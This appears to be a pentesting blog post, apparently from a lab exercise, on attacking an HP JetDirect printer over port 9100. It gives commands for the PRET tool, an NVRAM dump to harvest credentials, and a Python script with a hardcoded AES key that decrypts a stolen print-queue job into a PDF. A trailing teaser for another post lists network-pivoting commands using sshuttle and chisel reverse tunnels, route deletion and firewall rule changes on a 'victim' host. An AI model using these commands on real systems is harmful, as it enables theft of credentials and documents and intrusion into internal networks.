Skip to main content

Pentesting Printers

 

HP Jet Direct Exploit - Port 9100

git clone https://github.com/RUB-NDS/PRET.git

./pret.py 10.10.10.201 pjl

go to queued file and download it . get queued

nvram dump        #Ram Dump for creds
sed -e "s#’##g" queued | cut -c2- > queued.b64
cat queued.b64 | base64 -d > somefile.raw


decrypt_printer_queue.py


import io, sys, base64
from Crypto.Cipher import AES

with io.open('somefile.raw', 'rb') as fp:
        c = fp.read()[8:]
        iv, ct = c[:16], c[16:]
cipher = AES.new('13vu94r6643rv19u', AES.MODE_CBC, iv)
z = cipher.decrypt(ct)
sys.stdout.buffer.write(z)


python3 decrypt_printer_queue.py > newfile

file newfile
newfile: PDF document, version 1.4


mv newfile newfile.pdf



 

Comments

Popular posts from this blog

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...